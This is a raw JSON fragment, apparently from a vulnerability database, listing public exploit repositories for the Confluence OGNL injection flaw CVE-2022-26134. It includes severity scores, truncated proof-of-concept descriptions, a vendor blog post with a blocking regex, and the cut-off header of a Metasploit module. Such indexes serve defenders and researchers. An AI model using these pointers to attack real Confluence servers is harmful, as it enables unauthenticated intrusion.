"2022-06-22T17:49:52", "id": "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-10T15:41:24", "description": "\n\n### CVE-2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T04:30:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-10T14:31:50", "id": "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-23T11:29:36", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T02:43:06", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-23T09:14:22", "id": "B47171B0-339A-582E-8AAC-3B18373664B7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:19:01", "description": "# CVE-2022-26134 - conFLU\n\nPoC for exploiting CVE-2022-26134 on ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T17:33:18", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T17:34:07", "id": "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:57:19", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T21:26:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-12T22:09:30", "id": "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-17T08:32:21", "description": "# Through the Wire\n\nThrough the Wire is a proof of concept explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:59:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-17T07:58:44", "id": "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-20T21:50:16", "description": "# CVE-2022-26134\r\nCVE-2022-26134 - Confluence Pre-Auth RCE | OGN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T19:24:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-20T21:20:00", "id": "28E888C4-78E3-5F8D-B316-AB42FED892F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:57:53", "description": "# BotCon\nAttlasian Confluence Un-Authenticated Remote Code Execu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-11T11:22:55", "id": "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-23T20:11:29", "description": "# 0DAYEXPLOITAtlassianConfluenceCVE-2022-26134\n\nCVE-2022-26134 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T19:59:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-23T17:24:50", "id": "66468422-89C0-5AC8-9CEA-6B512338FF7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-24T20:39:44", "description": "# CVE-2022-26134\n\n1) First run the shodan scripts to grabs all t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T20:35:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-24T17:01:49", "id": "7BE60530-0495-5366-846A-73B1A778DBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-22T09:08:40", "description": "# confluencePot\n\nConfluencePot is a simple honeypot for the Atla...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T15:44:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-22T08:04:01", "id": "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-05T07:59:49", "description": "# CVE-2022-26134\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u6784\u9020OGNL\u8868\u8fbe\u5f0f\u8fdb\u884c\u6ce8\u5165\uff0c\u5b9e\u73b0\u5728Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-23T14:38:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-05T06:45:59", "id": "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-23T05:31:25", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-23T03:34:12", "id": "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-21T04:58:03", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T20:24:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-12T20:24:48", "id": "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:06", "description": "# CVE-2022-2613...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T02:16:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T02:20:41", "id": "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-23T23:15:05", "description": "pip3 install -r require...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T12:24:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-23T20:38:51", "id": "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:33", "description": "# Atlassian Confluence \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f(CVE-2022-26134)\nFoFa\uff1atitle=\"Con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T07:54:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T08:02:12", "id": "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-21T23:18:47", "description": "<h1 align=\"center\">\u300c\ud83d\udca5\u300dCVE-2022-26134</h1>\n\n<p align=\"center\"><im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-19T13:50:22", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-21T22:06:43", "id": "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "wallarmlab": [{"lastseen": "2022-06-14T17:59:22", "description": "We want to share this update regarding the critical Confluence 0-day vulnerability (CVE-2022-26134).\n\nOn June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution ([RCE](<https://www.wallarm.com/what/the-concept-of-rce-remote-code-execution-attack>)) vulnerability. Exploits are already publicly available and we expect this vulnerability to be heavily exploited in the wild.\n\nWe tested Wallarm\u2019s attack detection against the known exploit and confirmed that exploitation attempted are successfully detected and blocked. No further actions are required.\n\nTo mitigate the vulnerability when working in a monitoring mode, it\u2019s recommended to create a virtual patch rule based on Confluence recommendation. This rule will block any requests that contain a string ${ in the URI.\n\nYou can create the rule by yourself using the example below or contact our support team in case you want us to create the rule. The regex: [$][{]\n\nFeel free to reach out to support@wallarm.com if you need assistance.\n\nFurther updates will be published in Wallarm Changelog: <https://changelog.wallarm.com>\n\nThe post [Update on the Confluence 0-day vulnerability (CVE-2022-26134)](<https://lab.wallarm.com/update-on-the-confluence-0-day-vulnerability-cve-2022-26134/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T20:50:59", "type": "wallarmlab", "title": "Update on the Confluence 0-day vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T20:50:59", "id": "WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681", "href": "https://lab.wallarm.com/update-on-the-confluence-0-day-vulnerability-cve-2022-26134/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-08-17T08:41:50", "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n", "cvss3": {}, "published": "2022-06-03T19:27:13", "type": "metasploit", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T21:11:56", "id": "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include 